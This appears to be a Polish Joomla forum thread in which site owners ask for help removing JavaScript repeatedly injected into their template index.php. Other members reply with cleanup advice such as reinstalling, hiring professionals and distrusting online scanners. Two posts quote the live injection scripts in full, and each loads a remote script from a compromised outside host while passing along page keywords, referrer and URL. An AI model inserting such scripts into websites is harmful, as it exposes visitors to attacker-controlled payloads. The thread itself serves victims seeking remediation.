Walczę od jakiegoś czasu... co pewien czasu umieszcza mi w kodzie w index.php w sekcji head takie oto badziestwo : "<script>var a='';setTimeout(10);if(document.referrer.indexOf(l ocation.protocol+"//"+location.host)!==0||document.referrer!==undefined ||document.referrer!==''||document.referrer!==null ){document.write('<script type="text/javascript" src="http://newsco.fr/js/jquery.min.php?c_utt=SWR2D2&c_utm='+encodeURIComponent('http://newsco.fr/js/jquery.min.php'+'?'+'default_keyword='+encodeURICo mponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(met as){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window. location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer )+'&source='+encodeURIComponent(window.location.host)) +'"><'+'/script>');}</script>"

Zmieniałem hasła administratora, do serwera itd i dalej to samo... nie wiem może gdzieś jeszcze w innych plikach dodaje ... jak to badziewstwo usunąć na dobre ?

Artykuł Witryna po włamaniu na joomla.pl Kolega czytał? Zastosował się do opisanej tam metodyki postępowania po włamaniu?

Czytał ... wydaje mi się że nie znalazłem jakiegoś zainfekowanego pliku.... może ktoś miał podobnego wirusa i podpowie gdzie szukać ?

Cześć mam podobny problem... z góry odpowiadam artykuł czytałem już nie raz :)
Kod umieszczany w index.php w templates. Na wszystkich moich stronach...

Kod: script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b) )return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://jiva-klatovy.cz/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'K85164' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

Nie potrafię sobie z tym poradzić, już kilka miesięcy z tym walczę :/

Jeśli nie dajecie rady z opisem, który wskazał zwiastun (http://forum.joomla.pl/member.php?8-zwiastun), to powinniście dać komuś kto się na tym zna, zakładając temat w dziale zleceń. Niestety infekcje choć podobne nie są takie same i nie ma uniwersalnego rozwiązania. Leczenie może być bardzo czasochłonne w zależności od infekcji. Jeśli strona nie ma zbyt wiele treści, to proponuję wykasować wszystko (łącznie z usunięciem starej bazy danych), pozmieniać hasła i postawić ją od nowa.

A prosiliście providera o pomoc w przeskanowaniu witryny? U mnie pomogło (szybko i sprawnie dzięki Linuxpl.com)
Można też skopiować witrynę do siebie i przeskanować.
Są też witryny skanujące (nie pytajcie o nazwę bo nie pamiętam).

Jeśli nie dajecie rady z opisem, który wskazał zwiastun, to powinniście dać komuś kto się na tym zna

Nic dodać nic ująć. Szukanie na własną rękę nie mając w tym doświadczenia to jak szukanie igły...

Sprubujcie przeskanowac serwer tym antiwirusem powinno pomoc (ciach - niedozowolona reklama)

Sprubujcie

Co jak co, ale strona internetowa narzędzia z dziedziny bezpieczeństwa powinna budzić zaufanie.
Wasza nie wzbudza.
Wręcz przeciwnie.

powinna budzić zaufanie

Nie chodzi o zaufanie, a o wejścia na stronę ;-)
Ja nie wszedłem...

Nie potrafię sobie z tym poradzić, już kilka miesięcy z tym walczę :/
Pomyśl ile czasu straciłeś. Ile straciła twoja strona w oczach Google (jeśli jest zainfekowana przez kilka miesięcy). Jest też spora szansa, że trafiasz po kolei na każdą możliwą listę RBL, co w konsekwencji całkowicie uniemożliwi wysyłanie e-maili z twojej domeny, lub co gorsze z IP serwera.

Sugeruję rozeznać się w możliwościach, cenach jakie oferują osoby/firmy się tym zajmujące. Bardzo często okazuje się, że wszystko można naprawić w 24 - 48 godzin i nie jest to strasznie drogie.

Chciałbym także przestrzec przed bezgranicznym ufaniem w wyniki skanowania "skanerów online". Większość nie ma dostępu do wszystkich Twoich plików - więc nie mają możliwości sprawdzić Twojej strony w 100%. Wyczyścisz kilka wskazanych przez nie plików, a za 3 dni będzie to samo.

Prawda jest taka, ze skanery online moga co jedynie wyszukac wirusa w JS albo juz wynik w postaci HTML czyli tylko i wylacznie skutki. Przyczyn nie znajdzie.

Sluchaj Trzepiza. Zaden wirus mu nie straszny.

Wysłane z mojego E2105 przy użyciu Tapatalka

Są 3 rodzaje skanerów:
a) zewnętrze, strony online
b) wewnętrzne oparte o komponenty
c) "niezależne" czyli skanują pliki bazując na wewnętrznym silniku, czyli bez względu jaki to jest CMS

Opisałem wszystkie trzy , rozdz 2, 5 i 6 >> http://helion.pl/view/3926o/jowozr.htm